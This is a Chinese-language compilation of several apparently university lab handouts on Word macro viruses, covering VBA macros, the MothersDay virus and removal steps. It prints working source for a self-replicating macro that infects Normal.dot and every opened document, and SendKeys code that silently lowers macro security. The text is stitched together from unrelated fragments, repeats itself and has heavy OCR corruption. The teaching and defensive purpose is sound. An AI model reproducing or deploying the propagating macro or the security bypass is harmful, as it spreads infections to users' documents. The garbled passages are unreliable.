下载文档原格式
Word宏病毒实验1.实验目的Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。
本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。
2.实验所需条件和环境硬件设备:局域网,终端PC机。
系统软件:Windows系列操作系统支撑软件:Word 2003软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问实验环境配置如下图所示:受感染终端被感染终端宏病毒传播示意图3.实验内容和分析为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。
3.1. 例1 自我复制,感染word公用模板和当前文档代码如下:'Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.SaveNormalPrompt = FalseOurcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate ThenSet Host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith HostIf .Lines(1.1) <> "'Micro-Virus" Then.DeleteLines 1, .CountOfLines.InsertLines 1, Ourcode.ReplaceLine 2, "Sub Document_Close()"If ThisDocument = nomaltemplate Then.ReplaceLine 2, "Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd WithMsgBox "MicroVirus by Content Security Lab"End Sub打开一个word文档,然后按Alt+F11调用宏编写窗口(工具→宏→Visual Basic→宏编辑器),在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码,保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。
宏病毒原理及案例分析屈立成4114005088什么是宏?所谓宏,就是一些命令组织在一起,作为一个单独命令完成一个特定任务。
Microsoft Word中对宏定义为:“宏就是能组织到一起作为一独立的命令使用的一系列word命令,它能使日常工作变得更容易”。
Word使用宏语言Word_Basic将宏作为一系列指令来编写。
Word宏病毒是一些制作病毒的专业人员利用Microsoft Word的开放性即word中提供的Word BASIC编程接口,专门制作的一个或多个具有病毒特点的宏的集合,这种病毒宏的集合影响到计算机的使用,并能通过.DOC文档及.DOT 模板进行自我复制及传播。
宏可使任务自动化,如果在Word中重复进行某项工作,可用宏使其自动执行。
宏是将一系列的Word命令和指令结合在一起,形成一个命令,以实现任务执行的自动化。
用户可创建并执行一个宏,以替代人工进行一系列费时而重复的Word操作。
事实上,它是一个自定义命令,用来完成所需任务。
宏的一些典型应用如:加速日常编辑和格式设置、组合多个命令、使对话框中的选项更易于访问、使一系列复杂的任务自动执行等。
Word 提供了两种创建宏的方法:宏录制器和Visual Basic 编辑器。
宏录制器可帮助用户开始创建宏。
Word 在VBA 编程语言中把宏录制为一系列的Word 命令。
可在Visual Basic 编辑器中打开已录制的宏,修改其中的指令。
也可用Visual Basic 编辑器创建包括Visual Basic 指令的非常灵活和强有力的宏,这些指令无法采用录制的方式。
VBAVisual Basic for Applications(VBA)是Visual Basic的一种宏语言,是微软开发出来在其桌面应用程序中执行通用的自动化任务的编程语言。
主要能用来扩展Windows的应用程式功能,特别是Microsoft Office软件。
也可说是一种应用程式视觉化的Basic 脚本。
---------------------------------------------------------------最新资料推荐------------------------------------------------------宏病毒分析实验(新)宏病毒分析实验一、实验目的及要求:通过本实验的学习,大家应该理解宏病毒的概念、病毒机制、编写方法、传播手段以及预防处理措施。
二、实验基本原理:宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。
宏病毒的前缀是:Macro,第二前缀是:Word、 Word97、 Excel、 Excel97(也许还有别的)其中之一。
凡是只感染 WORD97 及以前版本 WORD 文档的病毒采用 Word97 做为第二前缀,格式是:Macro. Word97;凡是只感染 WORD97 以后版本 WORD 文档的病毒采用 Word 做为第二前缀,格式是:Macro. Word;凡是只感染 EXCEL97 及以前版本 EXCEL 文档的病毒采用 Excel97 做为第二前缀,格式是:Macro. Excel97;凡是只感染 EXCEL97 以后版本 EXCEL 文档的病毒采用 Excel做为第二前缀,格式是:Macro. Excel,依此类推。
该类病毒的公有特性是能感染 OFFICE系列文档,然后通过OFFICE 通用模板进行传播,如:1 / 5著名的美丽莎(Macro. Melissa) 。
一个宏的运行, 特别是有恶意的宏程序的运行, 受宏的安全性的影响是最大的, 如果宏的安全性为高, 那么, 没有签署的宏就不能运行了, 甚至, 还能使部分 Excel 的功能失效.所以, 宏病毒在感染 Excel 之前, 会自行对 Excel 的宏的安全性进行修改,把宏的安全性设为低. Application. SendKeys%TMSs%L{RETURN} 仅修改这个还不行, 很多宏会涉及到 VisualBasic, 所以, 宏的安全性还要信任对于VisualBasic 项目的访问, 所以, 综合安全级别的修改, 就为 Application. SendKeys%TMSs%LT%v{RETURN} 如何判断信任还是不信任对于VisualBasic 项目的访问, 可以用出错捕获进行修改: OnErrorGoToEnd_Sub ‘ 其它功能的程序段ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} 本段程序的功能为: 一旦宏无法正常就进行宏的安全性的修改和对信任对于VisualBasic 项目的访问的修改, 从而这宏病毒的正常运行提供系统支持. 本程序应放在 VBA 中的 ThisWorkbook PrivateSubWorkbook_Open() EndSub 这样一旦打开工作薄就会对其进行有效的修改. 完整的程序为: PrivateSubWorkbook_Open() OnErrorGoToEnd_Sub ‘ 其它功能的程序段 ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} EndSub 三、主要仪器设备及实验耗材:PC 电脑一台四、实验内容或步骤:---------------------------------------------------------------最新资料推荐------------------------------------------------------ 1.启动 Word,创建一个新文档。
实验报告课程名称:计算机病毒与防治实验名称:宏病毒分析组号:第四组班级:网工19102项目负责人实验日期小组成员一、实验目的Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。
本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。
【注意事项】1.本病毒程序用于实验目的,面向实验演示,侧重于演示和说明病毒的内在原理,破坏功能有限。
在测试病毒程序前,需先关闭杀毒软件的自动防护功能或直接关闭杀毒软件。
2.若在个人电脑上实验,最好在虚拟机中运行。
3.测试完毕后,请注意病毒程序的清除,以免误操作破坏计算机上的其他程序。
4.请勿传播该病毒。
传播该病毒造成有用数据丢失、电脑故障甚至触犯法律等后果,由传播者负责。
二、实验要求Windows系统、word2003 等软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问.如图:三、实验内容1. macro virus中的内容2.计算机病毒 ---->计算机宏病毒四、实验步骤A、自我复制,感染word公用模板和当前文档打开一个word文档,然后按Alt+F11调用宏编写窗口(工具宏Visual Basic 宏编辑器),在左侧的project—>Microsoft Word对象ThisDocument中输入以上代码,保存,此时当前word文档就含有宏病毒代码截图:只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。
Word宏病毒实验应用场景计算机病毒是一个程序,一段可执行码,对计算机的正常使用进行破坏,使得电脑无法正常使用甚至整个操作系统或者电脑硬盘损坏。
就像生物病毒一样,计算机病毒有独特的复制能力。
计算机病毒可以很快地蔓延,又常常难以根除。
它们能把自身附着在各种类型的文件上。
当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。
这种程序不是独立存在的,它隐蔽在其他可执行的程序之中,既有破坏性,又有传染性和潜伏性。
轻则影响机器运行速度,使机器不能正常运行;重则使机器处于瘫痪,会给用户带来不可估量的损失。
通常就把这种具有破坏作用的程序称为计算机病毒。
除复制能力外,某些计算机病毒还有其它一些共同特性:一个被污染的程序能够传送病毒载体。
当你看到病毒载体似乎仅仅表现在文字和图像上时,它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。
若是病毒并不寄生于一个污染程序,它仍然能通过占据存贮空间给你带来麻烦,并降低你的计算机的全部性能。
病毒往往会利用计算机操作系统的弱点进行传播,提高系统的安全性是防病毒的一个重要方面,但完美的系统是不存在的,过于强调提高系统的安全性将使系统多数时间用于病毒检查,系统失去了可用性、实用性和易用性,另一方面,信息保密的要求让人们在泄密和抓住病毒之间无法选择。
病毒与反病毒将作为一种技术对抗长期存在,两种技术都将随计算机技术的发展而得到长期的发展。
宏病毒是使用宏语言(VBA)编写的恶意程序,存在于字处理文档、电子数据表格、数据库等数据文件中,例如office 数据处理系统中运行,利用宏语言的功能将自己复制、繁殖到其他数据文档中。
宏分成两种:一种是在某个文档中包含的内嵌宏,如fileopen 宏;另一种是属于word 应用程序,所有打开文档公用的宏,如autoopen 宏。
Word 宏病毒一般都首先隐藏在一个指定的word 文档中,一旦打开了这个word 文档,宏病毒就被执行,宏病毒要做的第一件事情就是将自己copy 到全局宏的荡然区域,使得所有打开的文档都可以使用这个宏。
Word宏病毒实验【实验环境】Windows实验台所需工具:Word2021、Outloo2021【实验内容】动手实现Word宏病毒的代码编写,熟悉Word宏病毒的作用机制,然后对其进行查杀,掌握去除Word宏病毒的方法。
实验内容包括:(1)编写自己的宏病毒此处以例如1的代码为例;(2)对doc1进行病毒殖入;(3)观察实验效果;(4)进行病毒去除。
Word宏病毒实验【实验原理】宏病毒是使用宏语言VBA编写的恶意程序,存在于字处理文档、电子数据表格、数据库等数据文件中,例如office数据处理系统中运行,利用宏语言的功能将自己复制、繁殖到其它数据文档中。
宏分成两种:一种是在某个文档中包含的内嵌宏,如fileoents and Settings\Adiministrator\Aail附件进行传播,如梅丽莎病毒。
Word宏病毒实验【实验步骤】启动Windows实验台,进入Windows2021系统;双击桌面上的“病毒实验〞图标,进入病毒实验界面。
在界面上选择“Word宏病毒实验〞,进入其实施面板,如下图。
图实验进行前,要先点击“初始化病毒工具〞按钮,对其实验所需的工具进行初始化;在实验过程中,如果所需的工具被杀毒软件查杀,要再次点击“初始化病毒工具〞按钮,对工具重新进行初始化,以便实验顺利进行。
一、使用例如1代码选择“例如1源码〞,在右侧病毒介绍框内查看例如1 的源码,如下图。
二、图对doc1进行病毒殖入(1)点击“启动doc1〞,翻开Word文档,在菜单下选择“工具|宏|平安性〞,设置Word平安性,如下图。
(2)图按下AltF11或者选择“工具|宏|Visual Basic 编辑器〞,如下图;翻开如下图的ent,将例如1的源代码复制到此。
(3)图图查看“Normal|ThisDocument〞,如下图Normal下的ThisDocument为空。
(4)图关闭doc1文档。
然后再点击面板中的“启动doc1〞,在doc1翻开的过程中,会出现如下图的提示框,例如代码1执行成功。
电脑宏病毒实验
电脑宏病毒实验
演示宏的编写。
说明宏的原理及其安全漏洞缺陷。
理解宏病毒的作用机制。
下面是店铺收集整理的电脑宏病毒实验,希望对大家有帮助~~
电脑宏病毒实验
工具/原料
1、 Windows 系列操作系统
2、 Word2003应用程
方法/步骤
软件设置:关闭杀毒软件的自我防护功能。
打开word2003,选择“工具”|“宏”|“安全性”|命令,在弹出的对话框中将安全级别设置为低,在可靠发行商选项卡中,选择信任所有安装的加载项和模板,选择信任visual basic 项目的访问。
演示自我复制功能:打开或新建一个Word文档,ALT+F11快捷键进入宏编写窗口在Project|Microsoft word对象|ThisDocument中编辑实验源代码
保存文档重新打开文档将跳出一个窗口
4、宏病毒的删除
按Alt+f11快捷键进入宏的编辑窗口,分别删除Nomal和Project 里的this document,将其中的代码删除并保存,再次打开文档后宏病毒将不再运行。
XI'AN TECHNOLOGICAL UNIVERSITY实验课程名称宏病毒指导教师:________ 曹子建_____________成绩________________________________2016 年3 月28 日一. 实验目的1. 理解WORD病蠹的感染方式2. 理解WORD病蠹的工作原理3. 掌握WORD病蠹的杀蠹方法二. 实验原理WORD的文件建立是通过模板来创建的,模板是为了形成最终文档而提供的特殊文档,模板可以包括以下几个元素:菜单、宏、格式(如备忘录)等。
模板是文本、图形和格式编排的蓝图,对丁某一类型的所有文档来说,文本、图像和格式编排都是类似的。
WORD提供了几种常见文档类型的模板,如备忘录、报告和商务信件。
你可以直接使用模板来创建新文档,或者加以修改,也可以创建自己的模板。
一般情况下,WORD动将新文档基丁缺省的公用模板NORMAL.DOT由此可以看出,模板在建立整个文档中起的作用是作为基类,文档继承模板的届性,包括宏、菜单、格式等。
另外,WORDS提供强大的宏功能。
宏是能组织到一起作为一个独立命令使用的一系列WORD令,它能使日常工作变得更容易。
在WORD动时,会自动加载NORMAL.DOT板,以及它们所包含的宏。
您可以为宏指定特殊的名称,使其变为自动宏,以便在执行某一操作时,如:启动WORD打开文档,就自动执行具有特殊命名的宏。
同其他宏一样,你可以将自动宏定义在一个共用模板上,也可以将其定义在一个特定模板上。
宏病蠹主要寄生在以下3个宏中:AUTOOPENAUTONEVAUTOCLOS耶病蠹文档打开时,将病蠹传染给NORMAL.DOT用模板中,再由公用模板传染给所有其它正常的文档。
二. MOTHERSDAYVIRUS感染机制MOTHERSDAYVIRUS病蠹感染WORD档和NORMAL.DOT档。
被感染的WORD:档打开时或关闭时会首先弹出一个对话框,对话框关闭后再将控制权转移给正常的WOR度档执行。
MOTHERSDAYVIRUS DOCUMENT_OPEN文档打开时执行)感染NORMAL.DO迎用AUTOCLOSE动宏感染其它文出。
MOTHERSDAYVIRUS执行流程如下:(1) 判断当前文档和NORMAL.DO®否感染;(2) 如果NORMAL.DOT被感染,活空NORMAL.DO诉将病蠹复制到NORMAL.DQE时将宏重命名为AUTOCLOSE(3) 如果当前文档未被感染,活空当前文档宏命令,并将病蠹复制到当前文档,同时将宏重命名为DOCUMENT OPEN(4) 禁用WORD?宏编辑功能;(5) 添加自动保存功能;(6) 病蠹发作执行的操作(弹出对话框);(7) 返回到程序正常路径执行。
三. MICROSOFT WORDAPPLICATION 对象表示MICROSOFT OFFICE WORD 2囱㈱程序本身。
每次编写代码时,都应从APPLICATIO时象开始。
可以从APPLICATIONS象访问WORD开的所有其他对象和集合,以及APPLICATIONS象自身的届性和方法。
引用APPLICATIONS象后,就可以使用其方法和届性。
在用户启动一个WORD段的同时,也创建了一个APPLICATION^象。
用户可以使用APPLICATIONS象的届性或方法来控制或返回应用程序范围内的特性、控制应用程序窗口的外观或者调整WORD象模型的其他方面。
可以使用APPLICATION性来返回WORDAPPLICATION。
以下的示例从视图状态切换到打印预览状态。
APPLICATION对象的一些届性控制着应用程序的外观。
例如,如果DISPLAYSTATUSB"为TRUE那么状态栏是可见的,如果WINDOWSTATB4 值为WDWINDOWSTATEMAXJMIZE应用程序窗口处丁最大化状态。
以下的示例设置了屏幕上应用程序窗口的大小。
APPLICATION对象的届性也可以访问处丁对象层次中较低级的对象,比如WINDOWS合(代表了当前所有打开的窗口)和DOCUMENTS (代表了当前所有打开的文档)。
用户可以使用届性,有时候也叫做访问者,从对象层次中最高一级的APPLICATIONS象向下访问到较低级的对象(DOCUMENT象、WINDOW象、SELECTION象等等)。
可以使用以下两个示例之一来打开MYDOC.DOC 因为DOCUMENT性是共用的,所以APPLICATION!性是可选的。
共用届性和方法无需APPLICATIONS象限定符。
要在“对象浏览器”中浏览共用届性和方法的列表,可以在“类别”栏中单击“ <共用>”。
共用项就会列在“成员”栏中。
注释OPTIONS象包含了控制WORD用行为的一些届性。
许多OPTION^象的届性对应丁OPTIONM话框中的各项(TOOLS^单)。
使用APPLICATION^象的OPTIO阻性可以返回OPTIONS象。
以下的示例设置了三个应用程序范围内的选项(因为OPTION届性是共用的,所以在本示例中无需APPLICATION届性)。
(1)运用DOCUMENT。
当用户在WORD打开或创建一个文件的同时,也创建了一个DOCUMENT象。
用户可以使用DOCUMENT或DOCUMENTS的届性或方法来打开、创建、保存、激活或者关闭文件。
(2)返回DOCUMENT。
用户可以使用语法DOCUMENTS(INDEXM回作为一个DOCUMENT■象的任何打开的文档,在这里INDEX是该文档的名字或索引号。
(3)打开文档。
二|要打开一个已经存在的文档,可以使用OPE*法。
OPENJ法应用丁通过DOCUME楠生返回的DOCUMENT^。
以下的示例打开了文件TEST.DOC^当前文件夹)并且启动了更改跟踪。
|二|注意到在上例中OPE防法的返回值是一个DOCUMENT,该对象表示刚被打开的文档。
在此示例中的文件名不包含路径;因此,是假定了该文件在当前的文件夹中。
但这会导致出现一个运行时错误,因为一旦用户创建了与当前文件夹不同的文件夹,VISUAL BASIC就再也找不到该文件了。
但是,用户可以通过指明完整的路径,就如同下表所示的那样,来确保打开正确的文件。
(4)关闭文档。
要关闭一个文档,可以对DOCUMENT应用CLOS由法。
以下的示例关闭了名为“ SALES.DOC的文档。
如果对文档进行过修改,WORD^显示出一条消息来询问用户是否要保存所进行的修改。
用户可以随SAVECHANGES数使用WDDONOTSAVECHANGES WDSAVECHANGE隔:来使该提示不再出现。
以下的示例保存并且关闭了SALES.DO C 要关闭所有已打开的文档,可以对DOCUMENTS应用CLOS由法。
以下的示例没有保存修改就关闭了所有的文档。
(5)向文档添加对象。
可以使用随着能在DOCUMENT中访问的集合对象的ADD方法来向文档添加诸如脚注、备注或表格这样的对象。
例如,以下命令在MYRANGE量(MYRANGE 是一个包含了一个RANGE亏象的对象变量)所指定的位置上添加了一张3X3的表格。
以下的示例在MYRANGE量所指定的位置上添加了一个脚注。
一_______________ 要获得支持AD时法的集合对象列表,请参阅“帮助”中的“ AD时法”」(6)修改WORD令。
在“工具”菜单中,用鼠标指向“宏”,然后单击“宏的位置”。
在“宏的位置”一栏中,单击“ WORD令”。
在“宏名”一栏中,选中要修改的WORD令(例如,)。
在“宏的位置” 一栏中,选择要保存宏的模板或文档的位置。
例如,单击NORMAL.DOT(用模板)来创建一个共用宏(命令将会自动地对所有文档进行修改)。
二| 单击“创建”打开VISUAL BASIC编辑器,会显示出一个模块,该模块包含有一个与刚才被选中的命令同名的新过程。
如果选中了命令,那么就出现宏。
(7)保存活动文档或模板。
用户可以添加附加的命令或删除已有的ACTIVEDOCUMENT.SAVE。
命令每次运行时,宏都将WOR命令来执行。
要恢复原来的命令,需要更改宏的名字或删除它。
此外,用户还可以通过创建与WOR命令(例如,)同名的代码模块来用一个名为“MAIM的子例程替换一条WORD令。
(8) DOCUMENTS当用户打开或关闭一个已经存在的文档时,或者用户在新建一个文档时,就发生了文档事件,事件描述如下:当关闭一个文档时发生CLOSE#件。
| _________当创建一个基丁模板的新文档时发生NEVW件。
当打开一个文档时发生OPENJT件。
一个文档事件过程的范围取决丁它保存的位置。
如果在一个文档中保存OPE板CLOSES件过程,那么该过程仅当用户关闭或打开该文档时才发生;如果在一个模板中保存OPEFM CLOSED件,那么当打开或关闭基丁该模板的文档或该模板本身时,该过程才发生。
一个新事件过程必须保存在模板中;一个保存在文档中新事件过程决不会运行,因为文档只能基丁模板来创建。
四. 使用VBA VBS创建杀蠹宏1 .使用VBA<蠹通过宏的VBA代码恢复被病蠹篡改的设置,然后删除病蠹宏和杀蠹宏本身。
首先查看一下MOTHERSDAB的ATTACKS分。
在病蠹体被注入到文档中之后,MOTHERSD丽将设置病蠹感染标记,将MICROSOFT WOR象名称“ THISDOCUMEN政为“ MOTHERS D AY 我们要恢复这些设置,只要创建一个杀蠹宏并将上述代码中被置为“FALSE 的值都改为“ TRUE并将MICROSOFTOR酬象名称改回“ THISDOCUMENT可,恢复设置后再将病蠹宏和杀蠹宏一起删除就可以去除打开或关闭被感染的文档时弹出消息“计算机已感染母亲节病蠹”。
在删除病蠹宏时,要分别删除模板和当前活动文档中的病蠹宏代码。
在对文档进行杀蠹后,对文档进行保存。
总结杀蠹宏的基本结构为:(1) 恢复设置。
(2) 删除模板中的病蠹。
(3) 删除活动文档中的病蠹。
[(4) 保存文档。
杀蠹宏代码编写完成后,添加至病蠹宏末尾,然后运行此病蠹宏即可将MOTHERSDA# 删除。
2 .使用VBS杀蠹使用VBS脚本语言根据病蠹感染标记判断文档是否被感染,若感染病蠹则向此文档中写入杀蠹宏并运行将病蠹活除。
首先将杀蠹宏代码存入字符申中,等待被写入。
在写入字符申时要使用一些转义字符如双引号要使用“ CHR(34)”来替代,换行符要用“ VBCR替代,字符申之间要使用“ &”来连接。
上述代码我们假定杀蠹宏的名字是“ KILLVIR”,所有字符申都要放入双引号中,“VBCF& ”为换行标志,这样可以使宏代码在VBS脚本中更活晰。
还要注意将宏代码存入字符申时,字符申之间不能有空行或注释。
